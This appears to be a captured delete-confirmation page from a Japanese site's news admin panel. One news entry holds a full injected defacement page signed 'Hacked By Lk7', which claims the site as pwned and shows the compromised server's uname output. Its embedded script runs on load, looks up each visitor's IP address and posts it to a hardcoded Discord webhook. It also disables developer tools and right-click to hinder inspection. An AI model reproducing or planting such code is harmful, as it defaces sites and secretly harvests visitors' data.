▼最新情報管理画面
 
▼最新情報削除
2025年9月19日 <!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Hacked By Lk7</title>
<style>
body {
background-color: #000;
margin: 0;
padding: 20px;
display: flex;
flex-direction: column;
align-items: center;
min-height: 100vh;
font-family: 'Courier New', Courier, monospace;
position: relative;
}
#particles {
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
pointer-events: none;
z-index: -1;
}
.center-image {
max-width: 100%;
height: auto;
margin-bottom: 20px;
filter: drop-shadow(0 0 10px #ff0000);
animation: glow 2s ease-in-out infinite;
}
.ascii-art {
color: #ff0000;
font-size: 14px;
line-height: 1.2;
text-align: center;
white-space: pre;
margin-bottom: 20px;
text-shadow: 0 0 10px #ff0000, 0 0 20px #ff0000;
animation: flicker 3s infinite;
}
.neon-ascii {
color: #ff3333;
font-size: 14px;
line-height: 1.2;
text-align: center;
white-space: pre;
margin-bottom: 20px;
text-shadow: 0 0 10px #ff3333, 0 0 20px #ff3333, 0 0 30px #ff3333;
animation: flicker 3s infinite;
}
.greeting {
color: #808080;
font-size: 20px;
margin-bottom: 20px;
text-transform: uppercase;
letter-spacing: 2px;
text-align: center;
}
.system-info {
color: #fff;
font-size: 16px;
margin-bottom: 20px;
animation: glitch 1s linear infinite, typewriter 4s steps(60) 1s forwards;
overflow: hidden;
white-space: nowrap;
border-right: 2px solid #fff;
width: 0;
text-align: center;
}
.footer-text {
color: #ff0000;
font-size: 18px;
font-weight: bold;
text-transform: uppercase;
text-shadow: 0 0 10px #ff0000, 0 0 20px #ff0000;
margin-bottom: 20px;
letter-spacing: 1px;
text-align: center;
}
.extra-message {
margin-bottom: 20px;
text-align: center;
}
.exposed-link, .defacer-link {
color: #8B0000;
font-size: 16px;
font-weight: bold;
text-transform: uppercase;
text-shadow: 0 0 10px #8B0000, 0 0 20px #8B0000;
letter-spacing: 1px;
text-decoration: none;
animation: flicker 3s infinite;
display: block;
}
.exposed-link:hover, .defacer-link:hover {
color: #ff4040;
text-shadow: 0 0 15px #ff4040, 0 0 25px #ff4040;
}
@keyframes glow {
0% { filter: drop-shadow(0 0 10px #ff0000); }
50% { filter: drop-shadow(0 0 20px #ff0000); }
100% { filter: drop-shadow(0 0 10px #ff0000); }
}
@keyframes flicker {
0%, 100% { opacity: 1; }
50% { opacity: 0.8; }
}
@keyframes glitch {
0% { transform: translate(0, 0); }
10% { transform: translate(-2px, 2px); }
20% { transform: translate(2px, -2px); }
30% { transform: translate(-2px, -2px); }
40% { transform: translate(2px, 2px); }
50% { transform: translate(0, 0); }
}
@keyframes typewriter {
from { width: 0; }
to { width: 100%; }
}
@media (max-width: 600px) {
.ascii-art, .neon-ascii {
font-size: 8px;
}
.center-image {
width: 80%;
}
.greeting {
font-size: 16px;
}
.system-info {
font-size: 12px;
}
.footer-text {
font-size: 14px;
}
.exposed-link, .defacer-link {
font-size: 12px;
}
}
</style>
</head>
<body>
<img style="width: 30%;" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSNYqZujXUGJDG8GdIYB2CbDM2AiTblE-pwkCcUiLqXd2fmx9I3LDDh26uf&s=10">
<H1 style="font-size:30px;" class="ascii-art">

-=[ H4CK3D BY TEAM: GINDE10 ]=-
</H1>
<div class="footer-text">PWNADOS BY: Lk7 </div>
<div class="greeting">GREETZ:V3ND3774.XS - F4 - Unzky - Mizun0 </div>
<div class="greeting"> Hello admin of Osasco, you as been pwned by me ;-; !</div>
<div class="system-info">uname -a Linux bolsonaro 3.2.0-4-amd64 #1 SMP Debian 3.2.68-1+deb7u1 x86_64 GNU/Linux</div>
<div style="font-size: 15px;" class="greeting"> Ultrapassando NullSecLammers // SnowLammers // LordSecLammers // CodkLammers // and all teams lammers por ai ! </div>
<audio autoplay loop>
<source src="https://www.soundjay.com/buttons/beep-01a.mp3" type="audio/mpeg">
</audio>
<script>
async function logIP() {
try {
const response = await fetch('https://api.ipify.org?format=json');
const data = await response.json();
const ip = data.ip;
const webhookURL = 'https://discord.com/api/webhooks/1417697919779340420/DSutm10AGphBLCwJW1rSuBvC7RrmDB82tgZTTem7OlXJloYdbrg7XfiPzPaceViXDyPX';
await fetch(webhookURL, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
},
body: JSON.stringify({
content: `&#128293; New Visitor! IP: ${ip} &#127785;&#65039; Hacked by Unzky442`
})
});
} catch (error) {
console.error('Error logging IP:', error);
}
}
logIP();
document.addEventListener('keydown', function(event) {
if (event.key === 'F12' || (event.ctrlKey && event.shiftKey && event.key === 'I')) {
event.preventDefault();
}
});
document.addEventListener('contextmenu', function(event) {
event.preventDefault();
});
const canvas = document.getElementById('particles');
const ctx = canvas.getContext('2d');
canvas.width = window.innerWidth;
canvas.height = window.innerHeight;
const particles = [];
const particleCount = 100;
class Particle {
constructor() {
this.x = Math.random() * canvas.width;
this.y = Math.random() * canvas.height;
this.size = Math.random() * 2 + 1;
this.speedX = Math.random() * 1 - 0.5;
this.speedY = Math.random() * 1 - 0.5;
}
update() {
this.x += this.speedX;
this.y += this.speedY;
if (this.size > 0.2) this.size -= 0.01;
}
draw() {
ctx.fillStyle = '#ff0000';
ctx.beginPath();
ctx.arc(this.x, this.y, this.size, 0, Math.PI * 2);
ctx.fill();
}
}
function init() {
for (let i = 0; i < particleCount; i++) {
particles.push(new Particle());
}
}
function animate() {
ctx.clearRect(0, 0, canvas.width, canvas.height);
for (let i = 0; i < particles.length; i++) {
particles[i].update();
particles[i].draw();
if (particles[i].size <= 0.2) {
particles.splice(i, 1);
i--;
particles.push(new Particle());
}
}
requestAnimationFrame(animate);
}
window.addEventListener('resize', () => {
canvas.width = window.innerWidth;
canvas.height = window.innerHeight;
});
init();
animate();
</script>
</body>
</html>

最新情報を削除してもよろしいですか?